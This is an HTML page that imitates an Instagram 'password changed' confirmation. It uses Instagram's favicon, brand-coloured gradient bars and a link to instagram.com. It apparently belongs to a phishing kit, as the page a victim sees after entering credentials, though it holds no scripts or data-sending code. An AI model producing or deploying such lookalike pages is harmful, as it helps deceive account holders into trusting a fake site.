<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Change Password</title>
    <link data-default-icon="https://static.cdninstagram.com/rsrc.php/v3/yI/r/VsNE-OHk_8a.png" rel="icon" sizes="192x192" href="https://static.cdninstagram.com/rsrc.php/v3/yI/r/VsNE-OHk_8a.png">
</head>
<body>
    <div class="gradient">
        <div class="grad1"></div>
        <div class="grad2"></div>
        <div class="grad3"></div>
    </div>
    <div class="content">
        <h1 class="header">Thank You</h1>
    </div>
    <div class="done">
        <svg xmlns="http://www.w3.org/2000/svg" width="300" height="300" viewBox="0 0 124 124">
            <circle r="40" cx="60" cy="60" stroke="green" stroke-width="7" fill="white"></circle>
            <line x1="40" y1="60" x2="60" y2="75" style="stroke:green;stroke-width:7;stroke-linecap:round"></line>
            <line x1="60" y1="75" x2="80" y2="40" style="stroke:green;stroke-width:7;stroke-linecap:round"></line>
        </svg>
    </div>
    <div class="content">
        <p class="description">
            Your password has been changed successfuly.
            You can now <a href="https://www.instagram.com">Login</a>.
        </p>
    </div>
    <style>
        .gradient {
            display: flex;
            flex-direction: row;
            width: 100vw;
            height: 2px;
        }

        .grad1 {
            width: 32vw;
            height: 2px;
            background: linear-gradient(to right, orange, red);
            margin-right: 1vw;
        }

        .grad2 {
            width: 32vw;
            height: 2px;
            background: linear-gradient(to right, red, purple);
            margin-right: 1vw;
        }   

        .grad3 {
            width: 32vw;
            height: 2px;
            background: linear-gradient(to right, purple, purple);
        }
        .content{
            display: flex;
            flex-direction: column;
            align-items: center;
            width: 80vw;
            text-align:center;
            font-family: sans-serif;
            margin: auto;
            margin-top: 5vw;
        }
        .header {
            font-size:40px;
        }
        .description {
            font-size:15px;
        }
        .done {
            width: 300px;
            height: 300px;
            margin:auto;
        }

        a {
            text-decoration: none;
            color: rgb(76, 104, 215);
        }
    </style>
</body>
</html>
